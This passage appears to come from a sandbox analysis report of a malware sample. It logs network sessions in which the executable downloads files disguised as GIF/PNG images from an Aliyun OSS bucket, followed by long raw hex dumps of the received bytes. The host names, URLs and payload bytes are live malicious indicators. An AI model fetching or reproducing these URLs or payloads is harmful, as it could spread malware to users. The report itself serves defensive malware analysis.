b4 11 d7 18 68 e8 25 43 25 ee 66 2e eb a9 6e 27 e5 2a 66 e6 37 55 33 48 a5 7a f3 3e 87 86 85 84 ba 1b 71 00 f4 a5 c2 cb 09 d1 a2 c7 01 fd ae b3 c4 06 41 67 c9 Data Ascii: KTx)SSN'}4{0w13A=<NC<9%]QW/9hZ-sKrwr%H.FIAHUUQ ##f68++`nqyp0}'}27MKVHmKK^@uSS~h%C%f.n'*f7U3Hz>qAg
2025-01-01 07:24:29 UTC	4096	IN	Data Raw: 19 d1 84 d1 1d 87 d9 96 2c 92 1f 7c 91 d5 af 1f 26 92 a4 81 a7 a7 ea 23 26 9a bc 89 af af fc 9a 7a f2 3f f4 4a 64 50 ba 4a 30 7a f4 bd 7d 88 c2 05 8b ff 1d b4 ec 89 c6 7c c2 8d 32 0e 4c 31 de 98 dc 6a 51 e7 d7 fc d8 da 99 56 51 ef cf c4 e0 e2 af cf 2d a7 6c b9 15 39 01 13 27 ab d4 33 83 57 b6 71 35 f9 b3 2d 72 38 10 fe 76 3b b7 8b 5d 26 13 4c 8e 6a 23 10 41 81 7f 28 2d 46 84 6c 35 3a 52 4a d6 da db d4 51 93 47 38 15 56 96 54 05 32 6b ad 59 02 3f 69 7c 6b 7d 6d 7a 66 ac dc 01 7f b8 c5 7c bd ef 70 b2 c8 77 b7 d4 0d c0 01 78 3a 47 30 4a 0b 24 30 4d a2 b9 b8 b2 b1 06 dd 45 55 b8 52 1d dd 80 1c d2 a5 13 d9 8f 51 db 17 60 62 63 21 e0 99 13 79 81 b9 9f 93 92 26 e4 b8 39 11 30 70 3d 75 bf 93 7a 32 f0 b3 3d 46 06 90 8e 06 d7 85 85 86 be f3 81 ff 83 b5 b6 81 02 d7 Data Ascii: ,\|&#&z?JdPJ0z}\|2L1jQVQ-l9'3Wq5-r8v;]&Lj#A(-Fl5:RJQG8VT2kY?i\|k}mzf\|pwx:G0J$0MEURQ`bc!y&90p=uz2=F
2025-01-01 07:24:29 UTC	4096	IN	Data Raw: de 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb b4 Data Ascii: ImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{\|KH
2025-01-01 07:24:29 UTC	4096	IN	Data Raw: 19 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04 c2 Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 j@f@n\|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
2025-01-01 07:24:29 UTC	4096	IN	Data Raw: b6 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3 1d Data Ascii: RWrlmnohfjkdefg`abc\|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
2025-01-01 07:24:29 UTC	4096	IN	Data Raw: 18 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70 d8 Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[\|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-wZbjhYklc8wP=0{y}@zvMbrqp
2025-01-01 07:24:29 UTC	4096	IN	Data Raw: 51 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf Data Ascii: QmHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9\|<d?p%~}~jJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49939	39.103.20.97	443	6808	C:\Users\user\Desktop\0000000000000000.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 07:24:31 UTC	111	OUT	GET /c.gif HTTP/1.1 User-Agent: GetData Host: 3syd1z.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-01 07:24:31 UTC	545	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Wed, 01 Jan 2025 07:24:31 GMT Content-Type: image/gif Content-Length: 10681 Connection: close x-oss-request-id: 6774EDAF6AD6D537351411E1 Accept-Ranges: bytes ETag: "10A818386411EE834D99AE6B7B68BE71" Last-Modified: Tue, 31 Dec 2024 10:00:05 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 10287299869673359293 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: EKgYOGQR7oNNma5re2i+cQ== x-oss-server-time: 2
2025-01-01 07:24:31 UTC	3551	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-01 07:24:31 UTC	4096	IN	Data Raw: cf 62 ff 5a 3f 30 31 3a fe ee 75 37 8a ba 5b 85 e1 ec 6b 35 10 78 f6 6d 36 3d 23 d2 d0 cd ab db f8 37 32 1f 37 11 bf 96 19 b0 c6 be a6 a0 ee eb 24 5d 48 ae 73 f3 f5 c5 94 b0 70 dd c6 5c 11 f5 e3 28 66 41 36 66 ef 88 eb 8b 2d 92 d1 9e 9a 8e 78 c0 74 34 67 7b b1 f3 fc 59 49 81 89 f5 cf 42 a2 b8 b8 7a d9 bb 7f 45 04 62 02 52 34 b9 0e 45 7f ce ff c3 12 7c ec ed 9c 64 e7 85 d4 e8 6d e9 e8 2d c8 3d 69 6a 0d 66 e5 c2 e6 27 9e d7 9e 98 68 92 43 fb c4 05 18 16 a9 a8 72 cc e5 66 13 b1 0c 24 22 dc 23 42 b1 c5 b3 c5 9f fd f3 d6 88 82 8e d7 81 8f 50 ee 36 68 55 e9 6b 5a ae a1 ec ca 4e e8 e9 82 52 74 0c 38 e0 2c 9b 17 6f 51 cf 4d 52 2a df 70 1d 00 4d 53 4a 65 f0 2f 99 7a fa 82 f9 0c fb 20 75 c3 54 ed 1d 83 3b 0b af 29 d0 11 b9 47 4d 64 2c b9 73 9e 4e 8d b6 ee f3 66 39 Data Ascii: bZ?01:u7[k5xm6=#727$]Hsp\(fA6f-xt4g{YIBzEbR4E\|dm-=ijf'hCrf$"#BP6hUkZNRt8,oQMR*pMSJe/z uT;)GMd,sNf9
2025-01-01 07:24:31 UTC	3034	IN	Data Raw: 4c 5d 7f 79 25 b9 af f5 fa ff 2d d5 2f 9e 63 5a b4 eb 3c f8 2b dc 07 58 64 ef 7d 5f 68 f0 fa 8a e5 34 38 ff db ca a6 fb c5 61 06 c2 2a ef f0 07 da ad 1f 37 88 9e 3f 37 39 3a 64 4f 74 4c 1c 4f ed 8c 04 e8 32 2f 75 52 85 d3 c1 84 aa 26 20 b4 ef d2 50 e0 65 aa 59 8a eb 7f 04 7f cb 20 fc 09 65 90 40 b9 6c 83 0b ea fe ae a2 b0 2a 83 e0 55 8e c7 4f 10 9c 2e 0c 87 d5 7f 34 18 a1 4d 99 78 06 2b 80 c4 6e 0a 78 03 f4 c4 a6 5d 85 aa fc ce ec 05 9f 47 96 b7 e0 d0 c3 4d 07 1c 93 32 b7 41 1d f1 42 ea c2 af 1c 76 47 ce 69 21 ab b9 ca b8 0d 8c 28 8a f0 3e 70 0a d6 52 7a b0 e5 4d 54 5e 49 25 92 dc fe f8 6f c3 6a 72 b7 08 1a 6f 03 1f b2 0c dc f0 35 6c 4f a9 29 7a c1 f4 63 78 16 6c d9 94 34 46 75 19 48 f8 2d 56 35 df 65 55 d3 05 98 53 87 ae 10 a2 c3 46 bc c5 1c 6f 69 f0 27 Data Ascii: L]y%-/cZ<+Xd}_h48a7?79:dOtLO2/uR& PeY e@lUO.4Mx+nx]GM2ABvGi!(>pRzMT^I%ojro5lO)zcxl4FuH-V5eUSFoi'

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49950	39.103.20.97	443	6808	C:\Users\user\Desktop\0000000000000000.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 07:24:33 UTC	111	OUT	GET /d.gif HTTP/1.1 User-Agent: GetData Host: 3syd1z.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-01 07:24:33 UTC	547	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Wed, 01 Jan 2025 07:24:33 GMT Content-Type: image/gif Content-Length: 3892010 Connection: close x-oss-request-id: 6774EDB15B40CC3533097D78 Accept-Ranges: bytes ETag: "E4E46F3980A9D799B1BD7FC408F488A3" Last-Modified: Tue, 31 Dec 2024 10:00:17 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 3363616613234190325 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 5ORvOYCp15mxvX/ECPSIow== x-oss-server-time: 59
2025-01-01 07:24:33 UTC	3549	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-01 07:24:33 UTC	4096	IN	Data Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4 Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>\|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V\|
2025-01-01 07:24:33 UTC	4096	IN	Data Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi\|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
2025-01-01 07:24:33 UTC	4096	IN	Data Raw: 97 9b 9d 99 9d 9b 95 97 95 8b 8d 89 8d 8b b5 b7 b5 bb bd bf 2d db b5 b7 b1 8b 8d 8f 8d 8b 95 95 95 fb 9c 9f 9d 8b 95 97 95 8b 8d 8f 9d 8b f5 f7 f5 fb fd ff fd eb f5 f7 f5 8b 8d 8f 9d 8b 95 97 95 9b 9d 9f 9d 9b 95 87 95 8b 8d 8f 12 a4 b5 e6 b5 bb bd ff 4a 92 b5 3b b5 8b 8d 8f 0d eb 95 77 94 9b 9d df 82 fb 95 0f a8 8b 8d 8f 8d 8b 75 77 75 7b 7d 7f 1d 1b 75 47 60 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b b5 b7 b5 bb bd bf bd bb b5 b7 b5 8b 8d 8f 93 eb 95 d7 94 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f cd ae f5 7f f5 fb fd ff fd fb f5 f7 f5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d a1 f9 ee cd c3 b5 bb bd ef d4 ba b5 b7 a5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b 75 57 75 7b 1d 51 0f 1f 14 03 14 8b 8d f9 36 8b 95 Data Ascii: -J;wuwu{}uG`uWu{Q6
2025-01-01 07:24:33 UTC	4096	IN	Data Raw: 69 18 0b cc ef 77 23 0b dc 62 f5 92 bd ff f0 55 8b 71 aa 3a 3d 2b 0e e8 a2 e1 cd ea 57 ca 72 3f 3b a3 53 99 f3 19 2d 50 82 0e 0d 67 11 12 78 ff f7 c0 c2 9c d0 1f 35 b3 d6 c1 15 8b 71 1a 1f 9f 00 52 44 b6 6f bf 5c 42 7e 10 b4 79 e0 70 9b ec ea 3e 72 2b 74 62 9c c8 03 89 51 17 b4 ee 50 26 6c f4 04 88 dc ad 35 53 4d 06 b8 17 18 42 ac 5e c3 76 8a e3 0f 55 bd 10 fb 3f 3d a9 48 9d ea 3a a4 e2 a6 b4 3f 76 ce a4 1c 7c fb f9 82 7d fe 97 54 b4 b3 68 d2 ca 6b fa 63 cb 18 ff 4a 19 f9 7b ce a8 14 4b 2d e1 e4 ac ec 85 7b 1e 75 a1 29 ef 25 b4 c1 12 a6 c8 7c 21 bf 95 a2 cb d0 51 3b 62 af 3a aa cc 42 6d 00 8c 79 d0 be 06 b6 82 9f 76 84 17 1f 9e 9d b0 29 42 92 30 ee 02 cb 2e 78 cc a6 12 f0 07 e3 66 63 9f 49 05 39 61 2f 8e d5 7d 9a 70 87 1f c6 95 13 f3 f5 88 62 22 f4 1a 33 Data Ascii: iw#bUq:=+Wr?;S-Pgx5qRDo\B~yp>r+tbQP&l5SMB^vU?=H:?v\|}ThkcJ{K-{u)%\|!Q;b:Bmyv)B0.xfcI9a/}pb"3
2025-01-01 07:24:33 UTC	4096	IN	Data Raw: 59 fc a8 65 45 fc 8d 05 fd fb b3 9f 14 a2 f6 f8 cc c4 eb 39 9d d3 a3 9f a0 42 0a 18 58 74 c7 69 1d eb 8b bf f8 0a 86 d0 b8 94 b7 61 b0 9e 73 a2 69 b3 40 d3 c4 61 59 75 53 34 0e c7 4a cf b1 8f a5 1c 40 ae d5 10 f9 b3 9d 63 52 15 9e 8b 52 f6 a8 f0 ad 49 d7 f7 72 8e 78 64 f5 39 5f 0b 52 de 78 1c 55 45 37 4b fa 52 4d 22 ef 1a 7a 2b 77 55 11 34 b8 02 76 4b bc 41 00 36 50 70 72 34 04 b2 fc fc b3 02 62 64 d3 fa df dd e5 b8 e2 bd 6c e5 a6 e2 23 8e 49 61 66 4b de 3e d6 1f 11 74 6a d1 49 c0 da 1e df 8c f9 36 8a 61 dc e3 8e c6 1a 21 61 99 12 00 4b bc 3f 2f 86 71 66 94 e7 b9 fd a5 2f a6 09 9c b6 7f c9 3c 7d 99 5e d8 fd f5 f6 1c ce 71 0e c8 38 12 5d a5 a6 a8 b9 81 05 24 3e 7f 87 5f e9 b2 ac d8 50 4b 41 40 ae 76 80 40 a4 58 df 93 6f bb a4 25 c4 dc 1b f9 98 6d 46 50 50 Data Ascii: YeE9BXtiasi@aYuS4J@cRRIrxd9_RxUE7KRM"z+wU4vKA6Ppr4bdl#IafK>tjI6a!aK?/qf/<}^q8]$>_PKA@v@Xo%mFPP
2025-01-01 07:24:33 UTC	4096	IN	Data Raw: 82 6b 24 f1 76 c7 84 af a6 d8 72 87 9e 02 98 c2 20 b2 f1 7e 40 de 11 c4 b7 04 70 3b 4c f8 6d db 2d a9 ce 60 f5 10 4c 12 54 c5 c0 72 2e a1 d8 20 3a 3e 2a 25 eb 4b 0d 65 55 1a c4 48 1a 5e 6a 05 eb 8f 85 11 75 4e 9c 4d 91 ea 1e 6c 58 58 23 d5 a9 a7 43 0b 1c de b1 07 fa 5d 5e fb 87 19 ab 0f 82 15 1e ba 6f f1 63 c6 da 5d 0e ab af 31 1b bf 5a cd f6 53 1f 80 ab 2c 54 0f 0f 1b 81 1b a2 ce 13 0d 34 7e c8 33 6a cb 2c 24 f8 95 15 fe 8e 9d b5 5f fa 6f 6b 71 de 1e b5 8b 59 19 1d 09 5e ac 7c 16 63 9b d8 c8 b4 27 9d 9d bb 43 03 b0 6a a2 cc 20 6c 87 15 fd 83 53 0b 74 ba be 94 f4 dc 67 c5 f1 cb 96 3f f5 5d c0 5a b8 19 35 ae dd 45 b8 22 e8 49 6d f7 25 8d 40 da 70 d0 35 af 4d f4 b8 23 50 f0 45 df 6d c4 90 0a 98 39 7d 78 78 2e 64 92 61 cf c0 27 77 aa e9 3f f8 8d 38 ff 14 79 Data Ascii: k$vr ~@p;Lm-`LTr. :>*%KeUH^juNMlXX#C]^oc]1ZS,T4~3j,$_okqY^\|c'Cj lStg?]Z5E"Im%@p5M#PEm9}xx.da'w?8y
2025-01-01 07:24:33 UTC	4096	IN	Data Raw: 7d 65 0f 82 22 33 6c 58 70 0d b8 a6 df ea 7b 6d 7a 5f 99 fd 73 8d 00 c9 26 96 32 5f 9a 2d 5f 52 cd c3 af 35 d2 10 ab ac 7d 75 1f 92 32 53 12 21 c0 0e a8 ca d8 dd c7 d0 35 03 63 e9 2c 3e eb 04 88 24 5d 20 1c fa f5 63 e0 67 b3 2a db a8 82 4f 91 91 6e 78 3a 77 32 95 d2 d2 f3 31 f7 3a 09 7f 6b 09 80 20 ed f3 ca fa b6 ca 1e 07 6f f1 ea 8e 7e 4f df f1 ee 66 ca 0f a7 51 14 14 36 25 dc 96 50 91 b0 60 93 09 88 28 f5 58 20 ee bf f1 ff 75 17 d6 a0 c8 e1 27 4f 1e 06 29 03 1c 90 34 5d e2 3e e3 1d 28 c6 67 37 ac 93 2b e2 78 8e 2e d7 4d 83 2a 0a 90 3e 9f 8f 15 a3 7a 0a 90 76 d6 47 dd 4b e2 82 19 56 f6 3f ee a6 6f 8c 4a 79 5f df 1d 79 90 90 40 b3 29 a8 08 35 66 cc 97 f8 29 cb b8 4b 89 f7 f9 13 42 7a ec 0b d1 0c f7 79 ec 74 3d d3 55 25 47 d7 82 00 94 7d a5 84 da b6 7d d4 Data Ascii: }e"3lXp{mz_s&2_-_R5}u2S!5c,>$] cgOnx:w21:k o~OfQ6%P`(X u'O)4]>(g7+x.M>zvGKV?oJy_y@)5f)KBzyt=U%G}}
2025-01-01 07:24:33 UTC	4096	IN	Data Raw: e8 d2 e7 86 d8 b8 2d 86 04 1b e1 8b 98 09 7a 3b fe 9c 4d 52 15 f8 12 ed 29 9d a8 0f 40 e6 e5 0b eb ad 15 c7 ff 17 26 89 1c e1 b5 91 c7 16 33 50 17 9c 37 41 d3 06 73 61 28 5f ab 72 93 98 00 8a 6a 27 25 8b 41 b0 e7 2a 40 2e 6b be e6 f0 18 0c d2 28 51 ab 0c 08 02 67 5f 1a 0c 87 3a cc d9 74 dd c0 fd 7b 99 48 59 37 8d c3 26 3f 4d cf ea ea 8f 47 36 91 83 9c f4 2f 52 87 f9 10 b6 44 68 27 93 d2 36 2f 5d 2c 59 59 de 90 b4 e8 85 d4 e9 71 8f 42 65 b0 d8 16 f6 ff 1e 3b 4d 23 fa 1f 9e 5f 66 d6 96 8f 3f 35 40 28 de 44 3a fe c4 20 45 37 b3 18 0e ff ad 2b a7 83 7e 88 3a 6c b9 b9 31 4d dd 30 2d 5f e5 98 94 26 e7 f1 17 4f ba 13 8e 17 f2 ca 4c 08 6f 8e 74 4a 05 8d c4 24 3d 4b fb 22 c3 67 31 f6 85 11 26 a8 6e cf 31 7a 78 b7 f3 05 66 c0 b6 4d c3 3a 0e 1c bb 55 6d 30 27 5a a7 Data Ascii: -z;MR)@&3P7Asa(_rj'%A*@.k(Qg_:t{HY7&?MG6/RDh'6/],YYqBe;M#_f?5@(D: E7+~:l1M0-_&OLotJ$=K"g1&n1zxfM:Um0'Z
